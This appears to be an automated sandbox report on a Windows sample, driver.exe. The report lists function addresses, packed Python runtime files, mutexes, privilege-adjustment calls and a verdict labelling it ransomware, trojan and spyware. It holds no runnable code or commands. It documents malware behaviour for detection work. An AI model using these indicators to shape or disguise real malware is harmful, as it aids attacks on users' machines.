Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75425D2C0	77_2_00007FF75425D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542802A4	77_2_00007FF7542802A4
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754291314	77_2_00007FF754291314
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542442E0	77_2_00007FF7542442E0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75429832C	77_2_00007FF75429832C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754270374	77_2_00007FF754270374
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754252360	77_2_00007FF754252360
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75426C3E0	77_2_00007FF75426C3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754285468	77_2_00007FF754285468
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75426D458	77_2_00007FF75426D458
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75424A504	77_2_00007FF75424A504
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754270D20	77_2_00007FF754270D20
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754289D74	77_2_00007FF754289D74
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754291DCC	77_2_00007FF754291DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75424EE08	77_2_00007FF75424EE08
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754251E04	77_2_00007FF754251E04
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75428AE50	77_2_00007FF75428AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75424CE84	77_2_00007FF75424CE84
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75429FE74	77_2_00007FF75429FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754258E68	77_2_00007FF754258E68
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75428EEA4	77_2_00007FF75428EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75427AF0C	77_2_00007FF75427AF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754249EFC	77_2_00007FF754249EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754275F4C	77_2_00007FF754275F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542AAF90	77_2_00007FF7542AAF90
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75427C00C	77_2_00007FF75427C00C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754284FE8	77_2_00007FF754284FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542ADFD8	77_2_00007FF7542ADFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754278040	77_2_00007FF754278040
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754253030	77_2_00007FF754253030
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754270074	77_2_00007FF754270074
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75426C05C	77_2_00007FF75426C05C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754260104	77_2_00007FF754260104
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542A00F0	77_2_00007FF7542A00F0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75427D91C	77_2_00007FF75427D91C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75426D97C	77_2_00007FF75426D97C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542449B8	77_2_00007FF7542449B8
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542869FD	77_2_00007FF7542869FD
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75427FA6C	77_2_00007FF75427FA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754285A70	77_2_00007FF754285A70
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542AAAC0	77_2_00007FF7542AAAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75424CB14	77_2_00007FF75424CB14
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754284B38	77_2_00007FF754284B38
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754299B98	77_2_00007FF754299B98
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754258C30	77_2_00007FF754258C30
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754285C8C	77_2_00007FF754285C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754269D0C	77_2_00007FF754269D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754296D0C	77_2_00007FF754296D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75424DD04	77_2_00007FF75424DD04

Source: C:\Users\user\Desktop\driver.exe	Code function: String function: 00007FF8A80BDB03 appears 45 times
Source: C:\Users\user\Desktop\driver.exe	Code function: String function: 00007FF8A80BD32F appears 324 times
Source: C:\Users\user\Desktop\driver.exe	Code function: String function: 00007FF8A80BD341 appears 1192 times
Source: C:\Users\user\Desktop\driver.exe	Code function: String function: 00007FF8A80BD33B appears 39 times
Source: C:\Users\user\Desktop\driver.exe	Code function: String function: 00007FF8A80BD425 appears 48 times
Source: C:\Users\user\Desktop\driver.exe	Code function: String function: 00007FF6A29B2710 appears 104 times
Source: C:\Users\user\Desktop\driver.exe	Code function: String function: 00007FF8A8659350 appears 100 times
Source: C:\Users\user\Desktop\driver.exe	Code function: String function: 00007FF8A865A510 appears 88 times
Source: C:\Users\user\Desktop\driver.exe	Code function: String function: 00007FF8A8041325 appears 518 times
Source: C:\Users\user\Desktop\driver.exe	Code function: String function: 00007FF6A29B2910 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: String function: 00007FF7542849F4 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: String function: 00007FF754258444 appears 48 times

Source: driver.exe

Static PE information: invalid certificate

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: driver.exe	Binary or memory string: OriginalFilename vs driver.exe
Source: driver.exe, 00000000.00000003.2061307753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs driver.exe
Source: driver.exe, 00000000.00000003.2053185543.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2051128075.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2049905637.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs driver.exe
Source: driver.exe, 00000000.00000003.2054053292.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2053107068.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2050389879.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2053425753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2050911487.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2060369011.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs driver.exe
Source: driver.exe, 00000000.00000003.2049719363.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs driver.exe
Source: driver.exe, 00000000.00000003.2049386542.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs driver.exe
Source: driver.exe, 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenMagnifier.exej% vs driver.exe
Source: driver.exe, 00000000.00000003.2052849472.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2049030918.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs driver.exe
Source: driver.exe, 00000000.00000003.2051305695.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2052933128.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2050006207.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs driver.exe
Source: driver.exe, 00000000.00000003.2052601392.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2050665502.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2052186692.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2049613615.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs driver.exe
Source: driver.exe, 00000000.00000003.2053891584.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2049812241.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs driver.exe
Source: driver.exe, 00000000.00000003.2053705049.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2049276107.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs driver.exe
Source: driver.exe, 00000000.00000003.2050203653.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2051216435.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2052114302.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2060818691.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs driver.exe
Source: driver.exe, 00000000.00000003.2050744012.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2060487064.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs driver.exe
Source: driver.exe, 00000000.00000003.2050107027.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2049187512.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs driver.exe
Source: driver.exe, 00000000.00000003.2053818515.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2050305577.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2050573747.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2053584283.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2053499525.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2052770906.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2052365271.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2053032876.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2053261566.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2052527881.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2049537467.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs driver.exe
Source: driver.exe, 00000000.00000003.2052283988.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2051451471.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2050482974.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2052448279.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2052032548.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs driver.exe
Source: driver.exe, 00000000.00000003.2053342813.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2052687607.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe, 00000000.00000003.2051019921.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs driver.exe
Source: driver.exe	Binary or memory string: OriginalFilename vs driver.exe
Source: driver.exe, 00000002.00000002.2453899397.00007FF8B7E68000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs driver.exe
Source: driver.exe, 00000002.00000002.2453172755.00007FF8B7E42000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs driver.exe
Source: driver.exe, 00000002.00000002.2455512920.00007FF8B8F96000.00000004.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs driver.exe
Source: driver.exe, 00000002.00000002.2449471266.00007FF8A861A000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs driver.exe
Source: driver.exe, 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenMagnifier.exej% vs driver.exe
Source: driver.exe, 00000002.00000002.2455020204.00007FF8B8B4A000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs driver.exe
Source: driver.exe, 00000002.00000002.2455870767.00007FF8B93D8000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs driver.exe
Source: driver.exe, 00000002.00000002.2454577510.00007FF8B8B14000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs driver.exe
Source: driver.exe, 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs driver.exe
Source: driver.exe, 00000002.00000002.2456924312.00007FF8BA4FC000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs driver.exe
Source: driver.exe, 00000002.00000002.2452420004.00007FF8A8F2C000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs driver.exe
Source: driver.exe, 00000002.00000002.2456610950.00007FF8B9F7A000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs driver.exe
Source: driver.exe, 00000002.00000002.2451999449.00007FF8A8E27000.00000004.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamepython313.dll. vs driver.exe
Source: driver.exe, 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs driver.exe
Source: driver.exe, 00000002.00000002.2452733742.00007FF8B7E03000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs driver.exe
Source: driver.exe, 00000002.00000002.2456239486.00007FF8B984C000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs driver.exe
Source: driver.exe, 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs driver.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Users\user\Desktop\driver.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\driver.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
Source: python313.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9994215874784359
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9980279432552503
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9925709355828221

Source: driver.exe, 00000002.00000003.2080557147.000001C0EDBC5000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: 1.vbP

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@161/105@2/3

Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe

Code function: 77_2_00007FF75425CAFC GetLastError,FormatMessageW,

77_2_00007FF75425CAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75428B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		77_2_00007FF75428B57C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75425EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		77_2_00007FF75425EF50

Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe

Code function: 77_2_00007FF754263144 GetDiskFreeSpaceExW,

77_2_00007FF754263144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\SIHClient.exe	Mutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1900:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Users\user\Desktop\driver.exe	Mutant created: \Sessions\1\BaseNamedObjects\e
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03

